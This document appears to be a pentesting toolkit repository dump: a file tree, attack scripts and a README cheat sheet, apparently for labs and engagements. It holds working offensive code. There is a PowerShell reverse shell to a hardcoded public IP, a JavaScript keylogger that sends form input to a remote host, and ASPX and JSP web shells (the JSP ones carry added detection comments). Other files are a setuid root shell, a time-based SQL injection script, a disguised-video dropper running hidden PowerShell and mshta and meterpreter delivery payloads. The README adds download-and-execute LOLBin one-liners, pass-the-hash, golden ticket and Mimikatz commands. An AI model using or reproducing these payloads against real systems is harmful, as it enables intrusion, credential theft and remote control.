├── fdns.sh ├── setuid.c ├── downloadproxy.ps1 ├── minimum_csharp_shell.cs ├── archive.sh ├── lfi_infile.py ├── jsp_processbuilder_shell.java ├── keylogger.js ├── jspb64_shell.java ├── timebased_sqli.py ├── pocxsl.xsl ├── runas-cabesha-webdelivery.ps1 ├── detalle.SettingContent-ms ├── reverse.ps1 ├── powershell_to_meterpreter.sh ├── wget.vbs ├── fakevideo.cs ├── README.md ├── lfiunix.txt ├── linenumv2.sh └── nops.xsl /fdns.sh: -------------------------------------------------------------------------------- 1 | curl -s 'https://scans.io/_d/data/rapid7/sonar.fdns_v2/2018-02-04-1517731201-fdns_any.json.gz' | pigz -dc \ 2 | | grep -P "\.$1" \ 3 | | jq -r '.name' \ 4 | | tee fdnsx-$1.txt 5 | -------------------------------------------------------------------------------- /setuid.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | int main() 6 | { 7 | setuid(0); 8 | setgid(0); 9 | system( "/bin/sh -i" ); 10 | } 11 | -------------------------------------------------------------------------------- /downloadproxy.ps1: -------------------------------------------------------------------------------- 1 | $browser=New-Object System.Net.WebClient; $browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX($browser.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1"));Invoke-ShareFinder 2 | -------------------------------------------------------------------------------- /minimum_csharp_shell.cs: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import Namespace="System.Diagnostics" %> 3 | <%= 4 | Process.Start( 5 | new ProcessStartInfo("cmd" ,"/c " + Request["c"] ) 6 | { 7 | UseShellExecute = false, 8 | RedirectStandardOutput = true 9 | } 10 | ).StandardOutput.ReadToEnd() 11 | %> 12 | 
-------------------------------------------------------------------------------- /archive.sh: -------------------------------------------------------------------------------- 1 | archive() { 2 | 3 | curl -s 'http://web.archive.org/cdx/search?url='$1'%2F&matchType=prefix&collapse=urlkey&output=json&fl=original%2Cmimetype%2Ctimestamp%2Cendtimestamp%2Cgroupcount%2Cuniqcount&filter=!statuscode%3A%5B45%5D..&limit=100000&_=1532513891577' --compressed | grep -Po "(?<=\[\").*?(?=\")" 4 | 5 | } 6 | -------------------------------------------------------------------------------- /lfi_infile.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import base64 4 | 5 | 6 | while True: 7 | 8 | file = raw_input('$ ') 9 | resp = requests.get("http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=" + file) 10 | print resp.text 11 | m = re.search('(?<=\[\().*?(?=\)\])', resp.text) 12 | try: 13 | print base64.b64decode(m.group(0)) 14 | except: 15 | 'file does not exist or no permissions' 16 | -------------------------------------------------------------------------------- /jsp_processbuilder_shell.java: -------------------------------------------------------------------------------- 1 |
 2 | <%@ page import="java.util.*,java.io.*,java.lang.*"%>
 3 | <%
     // Web shell: runs the value of the "cmd" request parameter as an
     // operating-system process and writes that process's standard output
     // into the HTTP response.
     // NOTE(review): no authentication, authorization or allow-list check is
     // visible in this scriptlet, so any client that can reach the page can
     // run programs with the privileges of the servlet container. Found on a
     // server you operate, this file should be treated as an indicator of
     // compromise.
     // Detection: child processes spawned by the servlet container's JVM, and
     // JSP files that pass request parameters to ProcessBuilder.
 4 | String cmd = request.getParameter("cmd");
     // The parameter is split on single whitespace characters into an argv
     // array; ProcessBuilder starts the program directly, not through a shell.
 5 | Process a =( new java.lang.ProcessBuilder(cmd.toString().split("\\s"))).start();
     // Only the child's stdout is read; stderr is not consumed here.
 6 | InputStream in = a.getInputStream();
 7 | DataInputStream dis = new DataInputStream(in);
 8 | String disr = dis.readLine();
     // Copy the output to the response one line at a time until end of stream.
 9 | while ( disr != null ) {
10 | out.println(disr);
11 | disr = dis.readLine();
12 | }
13 | %>
14 | 
15 | -------------------------------------------------------------------------------- /keylogger.js: -------------------------------------------------------------------------------- 1 | var input = document.querySelectorAll("input"); 2 | 3 | function saveLocal(e) { 4 | var url = "http://192.168.30.178:8000/"; 5 | var method = "GET"; //Metodo HTTP 6 | var request = new XMLHttpRequest(); 7 | request.open(method, url + this.name + ":" + this.value, false); 8 | request.send(); 9 | } 10 | 11 | for (var i = 0; i < input.length; i++) { 12 | 13 | input[i].addEventListener("blur", saveLocal); 14 | 15 | } 16 | -------------------------------------------------------------------------------- /jspb64_shell.java: -------------------------------------------------------------------------------- 1 |
 2 | <%@ page import="java.util.*,java.io.*,java.lang.*"%>
 3 | <%
     // Web shell variant: Base64-decodes the "cmd" request parameter, runs the
     // decoded text as an operating-system process and writes that process's
     // standard output into the HTTP response.
     // NOTE(review): no authentication, authorization or allow-list check is
     // visible in this scriptlet. Found on a server you operate, this file
     // should be treated as an indicator of compromise.
     // Detection: because the command travels Base64-encoded, plain-text
     // matching on request logs will not show it; decode parameters before
     // inspection, or key on child processes spawned by the servlet
     // container's JVM and on JSP files that feed request data to
     // ProcessBuilder.
     // sun.misc.BASE64Decoder is a JDK-internal class, not a public API.
 4 | sun.misc.BASE64Decoder dec64 = new sun.misc.BASE64Decoder();
 5 | byte[] bc = dec64.decodeBuffer(request.getParameter("cmd"));
     // The decoded bytes are interpreted as UTF-8 text.
 6 | String sc = new String(bc, "UTF-8");
     // Split on single whitespace characters into an argv array; ProcessBuilder
     // starts the program directly, not through a shell.
 7 | Process a =( new java.lang.ProcessBuilder(sc.toString().split("\\s"))).start();
     // Only the child's stdout is read; stderr is not consumed here.
 8 | InputStream in = a.getInputStream();
 9 | DataInputStream dis = new DataInputStream(in);
10 | String disr = dis.readLine();
     // Copy the output to the response one line at a time until end of stream.
11 | while ( disr != null ) {
12 | out.println(disr);
13 | disr = dis.readLine();
14 | }
15 | %>
16 | 
17 | -------------------------------------------------------------------------------- /timebased_sqli.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | chars = "abcdefghijklmnopqrstuvwxyz123456789*!$#/|&" 5 | 6 | for n in range(10): 7 | 8 | for i in range(1,21): 9 | 10 | for char in chars: 11 | r = requests.get("https://domain/ajs.php?buc=439'and+(select+sleep(10)+from+dual+where+\ 12 | substring((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()\ 13 | +limit+"+str(n)+",1),"+str(i)+",1)+like+'"+char+"')--+-") 14 | 15 | 16 | secs = r.elapsed.total_seconds() 17 | 18 | if secs > 10: 19 | print char, 20 | 21 | print "\n" 22 | -------------------------------------------------------------------------------- /pocxsl.xsl: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 11 | 12 | -------------------------------------------------------------------------------- /runas-cabesha-webdelivery.ps1: -------------------------------------------------------------------------------- 1 | function runas-cabesha-webdelivery {param ($url,$user,$pass) 2 | $username = $user 3 | $password = $pass 4 | $securePassword = ConvertTo-SecureString $password -AsPlainText -Force 5 | $credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword 6 | Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales) 7 | $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL")) 8 | } -Credential $credenciales | Wait-Job | Receive-Job 9 | } 10 | 11 | // ACK to @cybervaka, the powershell God 12 | -------------------------------------------------------------------------------- /detalle.SettingContent-ms: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 
| windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel 6 | %windir%\system32\mshta.exe http://192.168.1.43/LICENSE.txt 7 | %windir%\system32\control.exe 8 | 9 | 10 | 11 | {12B1697E-D3A0-4DBC-B568-CCF64A3F934D} 12 | 13 | 14 | @shell32.dll,-4161 15 | @shell32.dll,-4161 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /reverse.ps1: -------------------------------------------------------------------------------- 1 | $client = New-Object System.Net.Sockets.TCPClient("47.88.59.85",4444); 2 | $stream = $client.GetStream(); 3 | 4 | $greeting = "PS " + (pwd).Path + "> "; 5 | $sendbyte = ([text.encoding]::ASCII).GetBytes($greeting); 6 | $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush(); 7 | [byte[]]$bytes = 0..255|%{0}; 8 | 9 | 10 | while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { 11 | $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); 12 | $sendback = (iex $data 2>&1 | Out-String ); 13 | $sendback2 = $sendback + "PS " + (pwd).Path + "> "; 14 | $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); 15 | $stream.Write($sendbyte,0,$sendbyte.Length); 16 | $stream.Flush() }; 17 | $client.Close(); 18 | //cat reverse.ps1 | iconv -f UTF8 -t UTF16LE | base64 -w0 19 | //powershell -Enc payload 20 | -------------------------------------------------------------------------------- /powershell_to_meterpreter.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # meterpreter ip & port 4 | lhost=10.10.14.xx 5 | lport=443 6 | 7 | echo " * Writing Payload" 8 | cat /usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload 9 | echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload 10 | 11 | echo " * Prepping Command" 12 | scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')" 13 | echo $scriptblock 
14 | 15 | echo 16 | echo " * Encoding command" 17 | encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`" 18 | echo $encode 19 | 20 | command="cmd.exe /c powershell.exe -Exec ByPass -Nol -Enc $encode" 21 | echo 22 | echo " * Final command" 23 | echo $command 24 | 25 | echo 26 | echo " * Starting HTTP Server to serve payload" 27 | python -m SimpleHTTPServer 28 | -------------------------------------------------------------------------------- /wget.vbs: -------------------------------------------------------------------------------- 1 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 2 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 3 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 4 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 5 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 6 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 7 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 8 | echo Err.Clear >> wget.vbs 9 | echo Set http = Nothing >> wget.vbs 10 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 11 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 12 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 13 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 14 | echo http.Open "GET", strURL, False >> wget.vbs 15 | echo http.Send >> wget.vbs 16 | echo varByteArray = http.ResponseBody >> wget.vbs 17 | echo Set http = Nothing >> wget.vbs 18 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 19 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 20 | echo strData = "" >> wget.vbs 21 | echo strBuffer = "" >> wget.vbs 22 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 23 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 24 | echo Next >> 
wget.vbs 25 | echo ts.Close >> wget.vbs 26 | -------------------------------------------------------------------------------- /fakevideo.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Diagnostics; 4 | 5 | namespace ConsoleApplication7 6 | { 7 | class Program 8 | { 9 | static void Main() 10 | { 11 | // Copiar el vídeo a un archivo temporal y abrirlo 12 | byte[] archivo = Properties.Resources.videoplayback1; 13 | string destino = Environment.ExpandEnvironmentVariables(@"%tmp%\video.mp4"); 14 | File.WriteAllBytes(destino, archivo); 15 | Process procesoArchivo = Process.Start(destino); 16 | 17 | // Ejecutar launcher 18 | ProcessStartInfo launcherProcess = new ProcessStartInfo(); 19 | // C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 20 | launcherProcess.FileName = Environment.ExpandEnvironmentVariables(@"%windir%\System32\WindowsPowerShell\v1.0\powershell.exe"); 21 | launcherProcess.Arguments = "powershell -noP -sta -w 1 -enc "; 22 | launcherProcess.WindowStyle = ProcessWindowStyle.Hidden; 23 | Process.Start(launcherProcess); 24 | 25 | // Esperar a que cierren el vídeo/imagen/pdf, lo que sea 26 | procesoArchivo.WaitForExit(); 27 | // Eliminar nuestro vídeo 28 | while (File.Exists(destino)) 29 | { 30 | try 31 | { 32 | File.Delete(destino); 33 | } 34 | catch { } 35 | } 36 | } 37 | } 38 | } 39 | 40 | // Credits to @3xploit 41 | 42 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Table of Contents 2 | 3 | - [Enumeration](#enumeration) 4 | * [Generic Enumeration](#genumeration) 5 | * [HTTP Enumeration](#httpenumeration) 6 | * [SSH Enumeration](#sshenumeration) 7 | * [SMB Enumeraion](#smbenumeration) 8 | * [SNMP Enumeration](#snmpenumeration) 9 | - [Explotation](#explotation) 10 | * [BOF Based Exploits](#bof) 11 | * [Weak 
Credentials](#weakcreds) 12 | * [HTTP Bruteforce](#httpbrute) 13 | * [Password Cracking](#passcrack) 14 | * [RCE](#rce) 15 | * [PHP RCE](#phprce) 16 | * [RCE via webshell](#rcewebshell) 17 | * [RCE WMIC (powershellless)](#rcewmic) 18 | * [LOLBins](#lolbins) 19 | - [Privilege Escalation](#privesc) 20 | * [Linux](#linux) 21 | * [Windows](#windows) 22 | * [Kernel Exploits](#kernel) 23 | - [Tunneling & Port Forwarding](#tunneling) 24 | * [SSH over TCP](#sshovertcp) 25 | * [TCP over HTTP](#tcpoverhttp) 26 | * [1. reGeorg](#regeorg) 27 | * [2. ABPTTS](#abptts) 28 | * [HTTP Redirectors](#httpredirectors) 29 | * [1. socat](#socatred) 30 | * [2. iptables](#iptablesred) 31 | * [Man's poor VPN](#poor) 32 | - [Windows Active Directory](#windowsad) 33 | * [Bypass Applocker](#applocker) 34 | * [Pass The Hash](#pth) 35 | * [Kerberos](#krb) 36 | * [Miscellaneous](#miscwin) 37 | - [Reverse Shells](#revshells) 38 | * [DNS with dnscat2](#dns) 39 | * [ICMP](#icmp) 40 | * [HTTP through proxy](#httpproxy) 41 | - [Miscellaneous](#misc) 42 | * [Interactive Reverse Shell](#interactiveshell) 43 | * [Windows File Transfer](#windowstransfer) 44 | * [Bypass VPN routing restrictions](#vpnrestrict) 45 | 46 | 47 | 48 | 49 | --- 50 | 51 | 52 | 53 |

Enumeration

54 | 55 |

Generic Enumeration

56 | 57 | - port fullscan 58 | 59 | - UDP scan 60 | 61 | 62 |

HTTP Enumeration

63 | 64 | - dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old 65 | 66 | - banner inspection 67 | 68 | - review source code 69 | 70 | - bruteforce with cewl-based dictionary 71 | 72 | - searchsploit look at versions properly 73 | 74 | - test all the paths with the exploits, mangle it 75 | 76 | - nmap --script vuln 77 | 78 | - nmap --script safe (ssl-cert, virtual hosts) 79 | 80 | - always intercept with Burp 81 | 82 | - nikto -h 83 | 84 | - LFI, RFI, SQL, RCE, XXE, SSRF injections 85 | 86 | - PUT method all directories 87 | 88 | - Change POST body encoding with Burp 89 | 90 | - Bruteforce parameter names 91 | 92 | - dirsearch with cookie once authenticated 93 | 94 | - download vulnerable application from exploit-db and examine it 95 | 96 |

SSH Enumeration

97 | 98 | - shellshock 99 | 100 | - bruteforce 101 | 102 | - user_enum 103 | 104 | - Debian OpenSSL Predictable PRNG 105 | 106 |

SMB Enumeration

107 | 108 | - nmap --script vuln 109 | 110 | - nmap --script smb* 111 | 112 | - nmap --script smb-enum-shares,smb-ls 113 | 114 | - enum4linux 115 | 116 |

SNMP Enumeration

117 | 118 | - snmpcheck 119 | 120 | - snmpenum 121 | 122 |

Exploitation

123 | 124 |

BOF exploit-based

125 | 126 | - change shellcode 127 | 128 | - make sure all badchars are removed 129 | 130 | - read the exploit properly in case this makes changes in the shellcode 131 | 132 | - capture traffic with wireshark making sure the entire shellcode is transmitted 133 | 134 | - run the exploit several times 135 | 136 | - make sure the JMP ESP matches OS and language 137 | 138 | 139 |

Weak Credentials

140 | 141 | 142 | HTTP Brute Force 143 | 144 | - wfuzz POST 145 | 146 | ```wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d "user=FUZZ&password=FUZ2Z" http://192.168.30.161/admin/index.php``` 147 | 148 | - hydra POST 149 | 150 | ```hydra 192.168.30.161 -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20``` 151 | 152 | - wfuzz NTLM 153 | 154 | ```wfuzz -c --ntlm "admin:FUZZ" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https:///api``` 155 | 156 | - wfuzz Basic Auth through Proxy 157 | 158 | ```wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/ActivosProduban/names.txt -z file,/root/Documents/Audits/ActivosProduban/names.txt --basic "FUZZ:FUZ2Z" -p 127.0.0.1:8080 https:///api/v1/``` 159 | 160 | 161 | Password Cracking 162 | 163 | - zip 164 | 165 | `fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip ` 166 | 167 | - /etc/shadow 168 | 169 |
170 | unshadow passwd shadow > passwords
171 | john --wordlist=/usr/share/wordlists/rockyou.txt passwords
172 | 
173 | 174 | - keepass 175 | 176 |
177 | keepass2john /root/Desktop/NewDatabase.kdb > file
178 | john -incremental:alpha -format=keepass file
179 | 
180 | 181 | 182 |

RCE

183 | 184 |

PHP RCE

185 | 186 | test: 187 | 188 | `````` 189 | 190 | simple shell: 191 | 192 | `````` 193 | 194 | `````` 195 | 196 | file upload: 197 | 198 | ```'); ?>``` 199 | 200 | file upload evasion: rot13 + urlencode 201 | 202 | `````` 203 | 204 | 205 |

RCE via webshell

206 | 207 | - All pentest monkey reverse shells: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 208 | 209 | - msfvenom x86/linux/shell_reverse_tcp -f elf 210 | 211 | - Metasploit `web_delivery` module 212 | 213 | - which wget | nc 214 | 215 |

RCE via WMIC

216 | 217 | Powershell without powershell: 218 | 219 | Generate payload with web_delivery 220 | 221 | ![powershellless1](https://user-images.githubusercontent.com/7115563/40374533-8da00e10-5de9-11e8-888e-3b1eaccb28b0.png) 222 | 223 | Encode Payload 224 | 225 | ![powershellless2](https://user-images.githubusercontent.com/7115563/40374540-908e0ca8-5de9-11e8-9002-5f03193b10a5.png) 226 | 227 | Include payload in xsl file 228 | 229 | ![powershellless3](https://user-images.githubusercontent.com/7115563/40374546-92dcda84-5de9-11e8-99c8-9066ae129644.png) 230 | 231 |
wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl"
232 | 233 | ![powershellless4](https://user-images.githubusercontent.com/7115563/40375266-73770028-5deb-11e8-92da-952692727bec.png) 234 | 235 |

LOLBINS

236 | 237 | SyncAppvPublishingServer 238 | 239 |
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://192.168.48.129:8000/reverse.ps1') | IEX"
240 | 241 | ![lolbin1](https://user-images.githubusercontent.com/7115563/40776727-ee904d00-64cb-11e8-8921-407581b13edf.png) 242 | 243 | rundll32 244 | 245 |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("regsvr32 /s /n /u /i:http://192.168.48.130:8080/bhRxgASz0.sct scrobj.dll")
246 | 247 | 248 |

Privilege Escalation

249 | 250 | 251 |

Linux Privilege Escalation

252 | 253 | - sudo -l 254 | - Kernel Exploits 255 | - OS Exploits 256 | - Password reuse (mysql, .bash_history, 000-default.conf...) 257 | - Known binaries with suid flag and interactive (nmap) 258 | - Custom binaries with suid flag either using other binaries or with command execution 259 | - Writable files owned by root that get executed (cronjobs) 260 | - MySQL as root 261 | - Vulnerable services (chkrootkit, logrotate) 262 | - Writable /etc/passwd 263 | - Readable .bash_history 264 | - SSH private key 265 | - Listening ports on localhost 266 | - /etc/fstab 267 | - /etc/exports 268 | - /var/mail 269 | - Process as other user (root) executing something you have permissions to modify 270 | - SSH public key + Predictable PRNG 271 | - apt update hooking (Pre-Invoke) 272 | 273 |

Windows Privilege Escalation

274 | 275 | - Kernel Exploits 276 | - OS Exploits 277 | - Pass The Hash 278 | - Password reuse 279 | - DLL hijacking (Path) 280 | - Vulnerable services 281 | - Writable services binaries path 282 | - Unquoted services 283 | - Listening ports on localhost 284 | - Registry keys 285 | 286 | 287 |

Kernel Exploits

288 | 289 | Linux: https://github.com/lucyoa/kernel-exploits 290 | 291 | Windows: https://github.com/abatchy17/WindowsExploits 292 | 293 | 294 | 295 |

Tunneling & Port Forwarding

296 | 297 |

SSH over HTTP (Squid)

298 | 299 | socat 300 | 301 |
socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128
302 | 
303 | ssh john@127.0.0.1 -p 9999
304 | 305 | 306 | proxytunnel 307 | 308 |
proxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555
309 | 
310 | ssh john@127.0.0.1 -p 5555
311 | 312 | proxychains 313 | 314 |
http 192.168.1.41 3128
315 | 
316 | proxychains ssh john@127.0.0.1
317 | 318 | ![proxychains](https://user-images.githubusercontent.com/7115563/33822522-1e15dbee-de58-11e7-9953-3da8ff684cfc.png) 319 | 320 | 321 | corkscrew 322 | 323 |
ssh john@192.168.1.41 -t /bin/sh
324 | 325 | ![cork](https://user-images.githubusercontent.com/7115563/33822672-b92a51f0-de58-11e7-9936-06056b7903b8.png) 326 | 327 | 328 |

TCP over HTTP

329 | 330 | For this technique, it is necessary to be able to upload a file to a webserver. 331 | 332 | 1. reGeorg 333 | 334 | File uploaded to the server correctly 335 | 336 | ![regeorge2](https://user-images.githubusercontent.com/7115563/33883424-028c9f0e-df3c-11e7-9559-b35667ae76db.png) 337 | 338 | Tunnel creation 339 | 340 | `python reGeorgSocksProxy.py -p 5555 -u "http:///admin/uploads/reGeorg.jsp"` 341 | 342 | Proxychains config 343 | 344 | ![regeorge1](https://user-images.githubusercontent.com/7115563/33883419-fcc15416-df3b-11e7-89a9-499ffc1de9cf.png) 345 | 346 |
347 | proxychains nmap -F -sT 127.0.0.1
348 | proxychains mysql -u root -p -h 127.0.0.1
349 | proxychains ssh localhost
350 | 
351 | 352 | ![regeorge3](https://user-images.githubusercontent.com/7115563/33883422-017021fe-df3c-11e7-8f99-f02de5084c02.png) 353 | 354 | Reference: https://sensepost.com/discover/tools/reGeorg/ 355 | 356 |
2. ABPTTS 357 | 358 | Upload File 359 | 360 | ![abbtts5](https://user-images.githubusercontent.com/7115563/33883774-6d249ffa-df3d-11e7-9f3f-68bf1e70465f.png) 361 | 362 | Configure proxychains and create the tunnel 363 | 364 | ```python abpttsclient.py -c tomcat_walkthrough/config.txt -u http://192.168.1.128/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22``` 365 | 366 | Usage 367 | 368 | ```ssh -p 22222 user@127.0.0.1``` 369 | 370 | ![abbtts7](https://user-images.githubusercontent.com/7115563/33883891-dc2f3c70-df3d-11e7-84e9-ebd9eab9ebee.png) 371 | 372 | Reference: https://github.com/nccgroup/ABPTTS 373 | 374 | 375 |

HTTP Redirectors

376 | 377 |
1. socat 378 | 379 |
socat TCP4-LISTEN:80,fork TCP4:REMOTE-HOST-IP-ADDRESS:80
380 | 381 | 382 | ![socatt](https://user-images.githubusercontent.com/7115563/42031184-a8b3deee-7ad5-11e8-96ae-9b38bfe82df2.png) 383 | 384 |
2. iptables 385 | 386 |
iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
387 | iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination REMOTEADDR:80
388 | iptables -t nat -A POSTROUTING -j MASQUERADE
389 | iptables -I FORWARD -j ACCEPT
390 | iptables -P FORWARD ACCEPT
391 | sysctl net.ipv4.ip_forward=1
392 | 393 | ![iptables](https://user-images.githubusercontent.com/7115563/41294963-97cc925c-6e59-11e8-8adf-8db85f6ffaf2.png) 394 | 395 | 396 | 397 |

Man's Poor VPN

398 | 399 | Forward traffic over SSH without needing ```ssh -D ``` 400 | 401 |
sshuttle -vr user@192.168.207.57 1X0.1X.0.0/16
402 | 403 | ![sshuttle](https://user-images.githubusercontent.com/7115563/42047219-02a13b70-7b00-11e8-9686-8bf2f44bee81.png) 404 | 405 | Proof: 406 | 407 | ![mantis2](https://user-images.githubusercontent.com/7115563/34785499-a0e7d838-f631-11e7-869f-d6fcdc1051e9.png) 408 | 409 | Reference: http://teohm.com/blog/using-sshuttle-in-daily-work/ 410 | 411 | 412 | 413 |

Windows AD Environment

414 | 415 |

Bypass Applocker

416 | 417 | 1. rundll32 418 | 419 | ```rundll32.exe PowerShdll.dll,main``` 420 | 421 | ![applocker](https://user-images.githubusercontent.com/7115563/34455568-dfe7d7c6-ed81-11e7-9869-de2d4e92f3aa.png) 422 | 423 | Reference: https://github.com/p3nt4/PowerShdll 424 | 425 | 2. Alternative powershell files 426 | 427 | ![applocker2](https://user-images.githubusercontent.com/7115563/34455569-e0136c6a-ed81-11e7-9b0e-127ae9d395e0.png) 428 | 429 | ```C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise``` 430 | 431 | 432 |

Pass The Hash

433 | 434 | 435 | Invoke a command Remotely 436 | 437 |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1')
438 |  
439 |  Invoke-WMIExec -Target SVHOST2  -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell whoami | out-file \\SVHOST2\C$\windows\bitch.txt"
440 | 
441 | 442 | Invoke Mimikatz Remotely 443 | 444 |
Invoke-WMIExec -Target SVHOST2  -Username Administrator
445 | -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell -Enc SQBFA...AoA"
446 | 447 | ![image](https://user-images.githubusercontent.com/7115563/34455757-1f6aed1c-ed86-11e7-9415-595fa5e8d6e7.png) 448 | 449 | Pass The Hash with Mimikatz 450 | 451 |
 Invoke-Mimikatz -Command '"sekurlsa::pth /user:adm_maint /ntlm:cbe55f143fcb6d4687583af520123b89 /domain:lazuli"'
452 | 453 | 454 |

Kerberos

455 | 456 | 457 | Generate Golden Ticket (Domain Admin Required) 458 | 459 |
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:LAZULI.CORP /user:krbtgt"'
460 | 461 | ![image](https://user-images.githubusercontent.com/7115563/34455725-7230ee30-ed85-11e7-9333-16372355ce60.png) 462 | 463 | ![image](https://user-images.githubusercontent.com/7115563/34455734-89934d5c-ed85-11e7-960e-9659e099c9df.png) 464 | 465 |
Invoke-Mimikatz  -Command '"kerberos::golden /user:adon /domain:LAZULI.CORP /krbtgt:ca1c2aeda9160094be9971bdc21c50aa /sid:S-1-5-21-1238634245-2147606590-2801756923 /id:500 /ticket:admin.kirbi /ptt"
466 | 467 | ![image](https://user-images.githubusercontent.com/7115563/34455745-9edd0360-ed85-11e7-84f0-6d62e621613b.png) 468 | 469 |
Invoke-Mimikatz  -Command '"kerberos::ptt admin.kirbi"'
470 | 471 | ![image](https://user-images.githubusercontent.com/7115563/34455747-b285372a-ed85-11e7-9374-c481108db77e.png) 472 | 473 | ![image](https://user-images.githubusercontent.com/7115563/34455748-bb0512c6-ed85-11e7-8d40-b6516cf8b0f3.png) 474 | 475 |

Miscellaneous

476 | 477 | Invoke Mimikatz 478 | 479 |
IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz
480 | 481 | Mimikatz C# 482 | 483 |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs
484 | 485 | https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7 486 | 487 | In case compiler is outdated: 488 | 489 |
nuget install Microsoft.Net.Compilers
490 | 491 | Runas Powershell 492 | 493 | ```Start-Process powershell.exe -Verb runas``` 494 | ```Start-Process powershell.exe -Credential ``` 495 | 496 | View Shares With Permissions 497 | 498 |
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder -CheckShareAccess"
499 | 500 | ![image](https://user-images.githubusercontent.com/7115563/34455620-34f292b4-ed83-11e7-92b0-3b8dd387146f.png) 501 | 502 | 503 | View files that contain certain words recursively 504 | 505 |
 ls -Path \\SVHOST1.LAZULI.CORP\tmp$ -Include "*pass*","*
506 | admin*","*secret*" -Recurse -ErrorAction SilentlyContinue
507 | 508 | ![image](https://user-images.githubusercontent.com/7115563/34455641-aa03adf4-ed83-11e7-8333-a69366714921.png) 509 | 510 | View files whose names contain certain words recursively 511 | 512 |
dir -Path \\SVHOST1.LAZULI.CORP -Include "*pass*","*admin*","*secret*" -Recurse -ErrorAction SilentlyContinue
